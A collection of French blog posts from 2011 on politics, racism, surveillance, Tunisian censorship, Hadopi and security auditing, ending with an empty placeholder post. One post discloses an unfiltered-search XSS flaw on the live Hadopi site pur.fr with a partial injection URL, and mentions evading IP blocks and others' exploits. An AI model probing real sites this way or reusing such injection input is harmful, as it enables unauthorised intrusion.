Non je ne suis pas de gauche… désolé ?http://www.paulds.fr/?p=2032http://streisand.me.thican.net/paulds.fr/index.php?20110711_184133_Non_je_ne_suis_pas_de_gauche____desole__Mon, 11 Jul 2011 16:41:33 +0000C’est fou comme quand on prend parti contre des mesures débiles lancées par un parti mal dirigé et qui s’est perdu dans ses objectifs on est catalogué comme appartenant à celui d’en face, même s’il n’a « d’en face » que le nom… Raté, je m’en suis aussi pris au PS et il n’est pas plus que l’UMP ma couleur politique.

Actuellement si l’on veut voter il faut s’inscrire (presque automatiquement mais j’y reviendrai) dans le sacro-saint clivage gauche / droite. Si je devais m’y inscrire mon cœur d’entrepreneur irait plutôt à droite mais le parti majoritaire à droite n’est pas du tout ce qui représente pour moi une couleur politique dont le rôle est de défendre les entreprises pour créer de l’emploi et de la richesse.

Oui je suis un atroce capitaliste qui croit en les vertus de l’entrepreneuriat, n’ayant pas pour le moment eu la chance de voir un autre régime fonctionner mieux, je me dis que le moins pire est pas nécessairement mauvais dans ses principes – son application c’est autre chose.

Pire encore : le parti de droite actuel foule allègrement au pied des valeurs qui pour moi sont fondamentales comme les droits de l’Homme ou la Neutralité du Net (pour ne citer qu’eux). Mais encore une fois ce n’est pas mieux en face et le jour où un responsable du PS m’a dit mot pour mot « je n’en n’ai rien à branler de la misère humaine » je me suis dit que non, je ne suis définitivement pas de gauche… surtout avec une gauche qui « défend » le peuple plus par carriérisme que par conviction ou qui ne se définit uniquement par l’opposition aux projets de la droite.

Bref je suis bien emmerdé au moment de voter, et ce clivage gauche / droite m’insupporte chaque jour un peu plus. Il part en effet du postulat que l’on doit diviser en deux la population pour que certains soient délibérément mis à l’écart, trop cons, trop pauvres ou trop trop riches qu’ils sont pour participer au débat qui finalement les concerne aussi un peu quand même. Je suis d’autant plus emmerdé que j’ai bien conscience que les informations qu’ont la majorité des français est bien partielle et manifestement orientée (ne me dites pas qu’un téléspectateur de TF1 est en mesure d’avoir un jugement clair sur le pays dans lequel il vit) et que dans ce contexte le vote est finalement un jeu de communication des politiques et des médias plus qu’un choix réel et éclairé du peuple.

Pour le moment, à 23 ans, je n’ai voté qu’une fois : nul.

En 2012 je pense, si je suis toujours en France, que je me déplacerai pour voter. Mais je serai bien emmerdé pour choisir un candidat qui me plaise. Le seul mouvement d’ampleur (donc Parti Pirate exclu, parti auquel va bien entendu mon cœur) qui me paraisse rassembler au-delà de ce clivage nauséabond et contre-productif est le parti des Verts… Reste à voir s’il sera bien mon choix de 2012, pas sûr à l’heure actuelle…

Edit : une chose que j’ai oublié de préciser : je connais des politiques à droite comme à gauche, des militants aussi, qui sont des gens intègres et formidables… Ils ne sont bien sûr pas visés par ce papier et je les prie de me comprendre ou de me questionner ;)

flattr this!

]]>
Le racisme, cette valeur si française et obsolètehttp://www.paulds.fr/?p=2025http://streisand.me.thican.net/paulds.fr/index.php?20110709_163708_Le_racisme__cette_valeur_si_fran__aise_et_obsoleteSat, 09 Jul 2011 14:37:08 +0000Certains le savent, d’autres non, la raison de mon absence de près d’un mois sur ce blog est due à mon implication dans un combat qui avait pour but de faire éclater un scandale politico-humanitaire sur fond d’omerta médiatique étonnante par son envergure : #Botzaris36. J’ai donc passé une semaine coupé de toutes technologies et à mon retour, anticipé car provoqué par des menaces de mort à mon encontre, me suis caché quelques jours pour que la tension retombe. Aujourd’hui encore j’évite de parler directement de ce sujet et je vais me pencher sur une valeur qui m’a réellement traumatisé dans ce combat pour un respect de la dignité humaine dans ce qui est encore mon pays : la France…

Par plusieurs endroits, voire de façon très directe (j’ai failli m’emporter suite à certains commentaires de mes proches), j’ai pu avec tristesse constater à quel point le racisme et la stigmatisation des étrangers étaient ancrés dans notre société supposée démocratique et défendre l’égalité entre être humains – français ou non, ce n’est pas la nationalité qui fait l’(in)humanité.

Le racisme est cette croyance ésotérique que l’on est meilleur que son voisin habitant parfois à quelques kilomètres de chez nous mais de l’autre côté d’une ligne naturelle ou non considérée par la politique comme la fin du périmètre d’action d’une représentation donnée.

Ainsi les Français peuvent être racistes des Italiens, les Marseillais des Parisiens mais peuvent également l’être les habitants d’un arrondissement de Paris par rapport à ceux de l’arrondissement voisin, ou même les habitants d’un appartement par rapport à celui d’à côté… Bref le racisme a une granularité différente en fonction du taux de pénétration du message rabâché par les médias ou les politiques (entre autres) poussant à croire que ceux qui nous sont étrangers sont responsables de notre malheur.

C’est bien connu que quand les chiottes sont sales chez moi, c’est de la faute à ma voisine !

Tout le raisonnement sur lequel se base le racisme est le déport de problèmes causés par nous-même sur d’autres en se basant sur des lignes imaginaires… Plutôt boiteux mais tellement efficace pour distraire la population de réels problèmes…

Il n’en reste pas moins une caractéristique commune à tous : Européens, Africains, Américains, Asiatiques, … tous… nous sommes tous humains, nous souffrons tous des mêmes problèmes, certains plus que d’autres, certains plus souvent que d’autres, … mais franchement, nous Français, sommes nous les plus à plaindre ? Avons nous le droit de refuser de reconnaitre ce caractère essentiel d’humanité à un étranger parce que sa couleur de peau n’est pas la même que celle de nos ancêtres, parce qu’il a un accent ou ne parle pas la même langue que nous, parce qu’il n’est pas de la même confession religieuse que nous ?

Et à l’heure où les frontières sont de moins en moins présentes dans nos pays riches (entre le Net et l’espace Schengen je n’ai eu besoin d’un passeport que cette année alors que j’ai déjà des amis à travers le monde et voyagé dans presque toute l’Europe) pouvons nous encore blâmer celui qui ne diffère pas tant que cela de nous finalement pour avoir eu l’outrecuidance de venir voir comment la vie se passe hors de ces quelques lignes qui devraient, selon toute logique, le condamner à être prisonnier à jamais d’une surface géographique définie mais qui n’a aucune légitimité humaine ?

En France tout particulièrement l’incompétence de nos dirigeants (à travers les années, pas seulement les 4 difficiles dernières qui ont largement aggravé le problème) nous a peu à peu poussés à ainsi généraliser les quelques cas dont on nous conte les histoires au JT de TF1 tous les soirs pour faire augmenter les quotas de minorités visibles à la téloche. Tout comme elle nous a poussés à croire que tout pourrait se résoudre en dressant un magnifique mur autour de nos bonnes valeurs franco-françaises. Si le racisme est de ces valeurs je pense qu’il faut effectivement construire un mur autour de la France, non pas pour empêcher d’autres de rentrer mais pour surtout stopper cette gangrène débile et éviter sa propagation à l’étranger… D’ici là il n’est pas trop tard pour ouvrir les yeux et dépasser le mode de réflexion que l’on tente de faire notre pour nous détourner de vraies questions autrement plus importantes.

Les frontières sont amenées à disparaitre, pourquoi ne pas commencer par se débarrasser de la connerie la plus nocive qu’elles aient créé ?

flattr this!

]]>
Quand la France devient la Chine, sous l’effet de 7 inconscients…http://www.paulds.fr/?p=2019http://streisand.me.thican.net/paulds.fr/index.php?20110708_114951_Quand_la_France_devient_la_Chine__sous_l___effet_de_7_inconscients___Fri, 08 Jul 2011 09:49:51 +0000Le 7 Juillet 2011, de 15h à 18h45 a été votée, par 11 députés dont 7 se sont prononcés pour, le fichage de l’ensemble de la population française ainsi que la surveillance électronique et étatique de ceux-ci. Bienvenue en Chine !

Il aura donc suffit de 7 personnes (dont j’aimerai avoir la liste pour les remercier personnellement) pour que cette France qui n’est déjà plus que l’ombre d’elle même s’enfonce au plus profond de ce que la technologie peut faire de pire (tout en continuant de réprimer ce qu’elle peut apporter de mieux).

Ces sept personnes, que l’on va estimer avoir eu un coup de mou au moment de voter, ont donc maintenant à porter la responsabilité de ce qui va venir par la suite, et que je vais vous lire dans ma boule de cristal là maintenant tout de suite. Mais rappelons également que l’hémicycle est censé être peuplé de 577 élus qui touchent un salaire pour justement prendre part aux débats. Ce jour-ci, ils étaient 11. La faute en incombe donc tout autant à ceux qui ne sont pas venus parce qu’ils avaient piscine alors que le sujet extrêmement grave et relativement peu technique était abordé…

Je vois, je vois…

D’ici peu, quand cette putain de puce sera dans nos gentilles cartes d’identités [numériques] et que les technologies seront déployées et les fichiers peuplés de nos identités, empreintes et ADN, chacun de nos déplacements dans le virtuel ou dans le réel pourra être tracé (ce qui est déjà le cas avec nos téléphones portables ou notre chère carte bleue utilisée à outrance), un profil psychologique pourra être établi grâce à ces données dont facebook rêverait, notre société sera devenue bien docile…

Un beau serveur gérant tout cela sera interrogé souvent, donc facilement localisable, et pas toujours de façon légale. Il sera en effet la cible principale de beaucoup de personnes conscientes des enjeux financiers de le pénétrer pour se saisir de tout ou partie des données à des fins tout à fait honorables comme le vol (non non, pas l’usurpation, ça c’est so 2010) d’identité ou le recel d’informations confidentielles…

En fonction de ce qu’il adviendra dudit serveur l’économie comme la sécurité du pays dans sa totalité seront compromises avec une possibilité, en cas de réelle attaque façon fight-club, de faire s’écrouler littéralement le pays.

Je quitterai le pays des droits de l’Homme et essayerai de me faire nationaliser ailleurs pour renoncer à la citoyenneté française qui a fini de me faire honte aujourd’hui.

Merci donc à ces 7 députés qui ont œuvré ensemble à détruire notre pays.

flattr this!

]]>
La Tunisie remet la machine à censurer en place…http://www.paulds.fr/?p=2014http://streisand.me.thican.net/paulds.fr/index.php?20110614_134402_La_Tunisie_remet_la_machine_a_censurer_en_place___Tue, 14 Jun 2011 11:44:02 +0000S’il y a un jour (hors le départ de Ben Ali) qui m’a marqué dans tous les évènements qui se sont produits depuis que Mohamed Bouazizi s’est donné la mort à Sidi Bouzid, déclenchant les prémisses de ce que l’on pourra plus tard appeler révolution, c’est le jour où le classement RSF a évolué pour supprimer la Tunisie des pays ennemis de l’Internet et la classer parmi les pays sous surveillances.

Dans le même temps la France glissait dans le sens inverse de pays neutre à pays sous surveillance.

Aujourd’hui c’est un coup de canif dans cette dynamique qui avait l’air de condamner la Tunisie à la liberté et la France à de bien sombres desseins. Non pas que la France ait fait quelque progrès que ce soit, non c’est relativement stable de ce côté-ci, mais la Tunisie elle remet peu à peu sa machine à censure en marche…

Aujourd’hui l’ATI (Agence Tunisienne d’Internet), qui s’était portée partie civile contre une décision de justice visant à remettre en place la censure des sites internet pornographiques, s’est fendue d’un communiqué expliquant que le combat était (jusqu’à l’appel prévu le 4 Juillet) perdu et que la censure allait progressivement revenir, au moins sur les sites pornographiques.

Comme nous, français, nous sommes battus contre la censure des sites diffusant des contenus pédopornographiques par la LOPPSI il est bon de se souvenir qu’aucune censure n’est justifiée ou justifiable dans un pays démocratique !

Dans le cas français il est aisé de voir que de tels contenus doivent être supprimés et que les acteurs de cette diffusion doivent être mis hors d’état de poursuivre pareilles activités au lieu d’être simplement cachés aux yeux de nos concitoyens.

Dans le cas tunisien il faut que tous comprennent que la censure d’un pan aussi énorme du Net ne peut entrainer que des dérives volontaires ou non provoquant des cas de censure arbitraire de contenus tout à fait légitimes, même au regard de la prétendue morale dictée par la poignée de décideurs qui condamne aujourd’hui la pornographie.

Des solutions existent pour qui veut « protéger » ses enfants de la pornographie, à commencer par les logiciels de contrôle parental ou, plus vraisemblablement, l’éducation. Mais abandonner un Internet libre à un combat aussi futile que celui-ci me parait être très dommageable.

Cet article a été écrit à la demande d’amis tunisiens, je ne me permettrai pas de remettre en cause la légitimité du système démocratique tunisien en d’autres circonstances. La censure est un sujet bien trop grave et que je connais suffisamment bien pour que je conserve le silence.

Alors comme la médiatisation a joué un rôle extraordinaire (quand elle est enfin arrivée) dans ces soulèvements populaires il est temps que tous prennent conscience de ce qui risque de se passer si la censure reprend ses droits en territoire tunisien…

Elle a été l’arme de prédilection de Ben Ali et est un des symboles de son pouvoir. A l’étranger la censure tunisienne est un exemple de ce que tous redoutent…

La protestation a été l’arme de prédilection des opposants, la médiatisation par les pays étrangers un outil non négociable.

Ne laissez pas Ammar404 revenir…

flattr this!

]]>
Encore merci Hadopihttp://www.paulds.fr/?p=2012http://streisand.me.thican.net/paulds.fr/index.php?20110613_220943_Encore_merci_HadopiMon, 13 Jun 2011 20:09:43 +0000On oublie trop souvent de voir les bons côtés de la Hadopi et en ces temps de promotion, de publicité, que dis-je de propagande, il est bon de reconnaitre à Hadopi quelques qualités. Ce soir notamment Hadopi m’a rendu un service immense !

J’avais pris cette mauvaise habitude de regarder de temps en temps la télévision et, à part pour savoir ce que les français qui se contentent de la boite à images pour s’informer de ce qui se passe en dehors de leur quotidien immédiat, ce machin n’a finalement que peu d’intérêt… Après avoir mangé deux spots de propagande de la Hadopi en 10mn (et ce juste après avoir regardé un bon film) j’ai décidé de couper la télévision jusqu’à la fin juillet, date de fin de la campagne en cours.

Cette fréquence n’est d’ailleurs pas sans soulever des interrogations sur Twittercertains se demandent comment Hadopi peut-être si présent pour un si « maigre » (toutes proportions gardées) budget…

Au delà de l’épisode de ce soir il est non de se souvenir tout le bien que je pense de la Hadopi, point de vue que j’ai résumé dans ce post et dans ma lettre de motivation au poste de community manager !

D’ici là, merci Hadopi, j’ai un film au chaud !

flattr this!

]]>
Hadopi lance sa campagne avec une négligence caractériséehttp://www.paulds.fr/?p=2000http://streisand.me.thican.net/paulds.fr/index.php?20110613_133034_Hadopi_lance_sa_campagne_avec_une_negligence_caracteriseeMon, 13 Jun 2011 11:30:34 +0000Vous connaissez la rengaine, chaque fois que Hadopi met son site à jour je trouve une faille sur les ajouts. Ce matin c’est un tout nouveau site qui est mis en ligne : pur.fr (vous n’avez pas cru que j’allais leur faire un backlink ?) et forcément je me suis mis dessus – pas de jour férié qui compte !

Et forcément, après avoir grillé 2 de mes IP (j’en ai quelques unes sous le coude c’est pas bien grave) j’ai fini par trouver une petite XSS… Comme un air de déjà-vu !

Sauf que nos amis de Agence H ont pris la précaution d’installer une classe qui se charge de filtrer les URL suspectes… Un peu violente puisqu’elle va blacklister l’adresse IP du supposé attaquant lui interdisant dès lors l’accès à la totalité du site… Super pour un site d’information sur les « usages responsables » !

Le trou est sur la page de recherche (oui oui il y en a une, elle est juste cachée) et vient du non-filtrage de la variable recherchée… Un grand classique !

Ainsi en appelant l’url suivante : http://www.pur.fr/search/node/here »>ICI – Le code source de la page deviendra :

On voit assez nettement que les caractères surlignés sont interprétés comme du code HTML et non comme du texte. Sans la classe de blacklisting sauvage des IP, cette faille serait exploitable pour modifier le contenu de la page, exécuter du code arbitraire, … Ou ajouter The Pirate Bay dans les offres PURes par exemple…

On en revient donc au paradigme déjà avancé par la Hadopi : pour sécuriser sa connexion, il faut la couper !

Bon en passant le code source du site est juste affreux, l’optimisation inexistante et des brides de code PHP sont visibles en commentaire dans le code HTML…

4/20, revoyez votre copie élève Hadopi/Agence H !

Edit : @_noKid a trouvé un moyen (drôle) d’exploiter la faille sans énerver la classe anti-hack : http://goo.gl/ckwdY – Bien joué à lui !

Edit 2 : Moteur de recherche désactivé, @tieumtieum a eu le bon réflexe de faire une capture d’écran, ici : http://lockerz.com/s/110337119

Edit 3 : De fail en pire : @ssx3max me signale une autre XSS qui m’avait échappé et qui est déjà exploitée : http://t.co/VVSeWrF

flattr this!

]]>
TMG va être audité par HSC… On s’en fout un peu…http://www.paulds.fr/?p=1997http://streisand.me.thican.net/paulds.fr/index.php?20110608_152115_TMG_va_etre_audite_par_HSC____On_s___en_fout_un_peu___Wed, 08 Jun 2011 13:21:15 +0000Depuis aujourd’hui on connait le nom de la boite qui va auditer la milice de la Hadopi (TMG) : HSC. L’occasion de vous expliquer rapidement pourquoi il ne faut rien attendre de cet audit et à quel point il s’agit de poudre aux yeux…

Concrètement une mission d’audit se déclenche quand un client X (ici les ayants-droits et TMG) approche une entreprise ou un expert Y (ici HSC) pour réaliser une analyse d’un existant en vue d’obtenir des préconisation d’évolution sur des domaines de qualité, sécurité, référencement, … Ici on parle d’audit de sécurité, ça tombe bien, c’est mon boulot !

Quand un client X m’approche, et avant même de travailler sur un devis, est signé un contrat de confidentialité (dans 99.99% des cas on va dire) garantissant que je ne vais pas dévoiler mes découvertes sur mon blog par exemple. Cette clause de confidentialité est reconduite dans le contrat de prestation, elle permet notamment de garantir au client qui va me livrer ses sources que je les garderai pour moi. Certains imposent même que les sources soient shrédées une fois la mission d’audit réalisée. Une contrepartie financière très lourde est prévue en cas de manquement à cette clause (le genre qui te fait passer l’envie de faire du full disclo).

Une fois le devis transmis et accepté la phase d’audit peut commencer. Il s’agit d’analyser l’existant et d’en relever les défauts de la façon la plus exhaustive possible. Plusieurs façons de procéder ici :

- à l’aveugle : je n’ai pas les sources et bosse sur un serveur de test que je vais malmener autant que possible pour me placer dans un rôle d’attaquant bête et méchant (c’est ma méthode préférée, relativement chèr, aucune garantie donnée sur le rapport final vu que l’on peut rater quelque chose).
- rapport classique : j’ai les sources, je me base sur celles-ci et cherche directement dans le code ce qui peut poser souci (je ne suis pas fan, c’est de la lecture de code, de bonnes garanties sur le résultat final si suffisamment de temps).
- méthode hybride : un peu des deux au dessus, en général je commence par taper à l’aveugle et je vérifie les sources ensuite… (franchement fun, très cher, très bonnes garanties).

Cette phase d’audit dure plus ou moins longtemps en fonction de la taille et de la complexité du système analysé. Il n’y a pas de norme réelle, le plus tu payes le plus j’ai le temps de creuser et plus les résultats seront proches de l’exhaustivité. Si tu me demandes de t’auditer un site web en 3 jours il y a intérêt à ce que le machin soit très light !

Ensuite vient le rapport d’audit, j’ai consigné toutes mes découvertes dans un tableur open office (z’avez pas cru que je bossais sur excel quand même !) et je n’ai plus qu’à mettre en forme.

Pour chaque anomalie relevée un paragraphe est consigné dans le rapport expliquant la nature de anomalie, sa localisation (éventuellement multiple), ses implications ainsi que deux indicateurs : la criticité et la quantité estimée de travail pour corriger ladite anomalie. Le tout est remisé dans un rapport marqué « confidentiel » de partout… et qui commence par dédouaner l’expert en expliquant le périmètre de l’audit (typiquement quand j’audite du Web je n’audite pas Apache ou PHP) et qu’éventuellement, même dans ce périmètre, des choses peuvent avoir échappé à l’audit faute de temps (c’est relativement cher donc le client négocie souvent pour que l’on bosse pas trop).

Le client dit merci, paye et éventuellement mandate une autre boite pour corriger ce qu’il juge nécessaire de corriger, essentiellement en fonction des deux indicateurs par anomalie fournis par l’expert. Concrètement si une anomalie mineure est relevée et que la corriger demande beaucoup de temps de travail, vous avez toutes les chances qu’elle reste en place…

Le client a la jouissance exclusive du rapport et le pouvoir de décider ce qui est à corriger ou non. L’expert qui a réalisé l’audit sait de quoi il retourne mais est toujours tenu par la clause de confidentialité. Souvent il doit se débarrasser du document produit et l’affaire s’arrête là pour lui.

Alors même avec toute la compétence que peut avoir HSC (que je ne connais pas) et sachant que l’audit a été commandé par TMG et les ayants-droits, qui n’ont aucun intérêt à ce que les serveurs de test de TMG soient reconnus comme ce qu’ils sont : des passoires, ne vous attendez pas à un quelconque résultat ou à la moindre dans la pratique.

TMG et les ayants-droits viennent de mandater des experts facturés entre 500€ et 900€ la journée pour ne pas avoir l’air (trop) cons…

flattr this!

]]>
Some data i would not want disclosed before due datehttp://www.paulds.fr/?p=2654http://streisand.me.thican.net/paulds.fr/index.php?19691231_230000_Some_data_i_would_not_want_disclosed_before_due_dateWed, 31 Dec 1969 22:00:00 +0000bla bla bla

flattr this!

]]>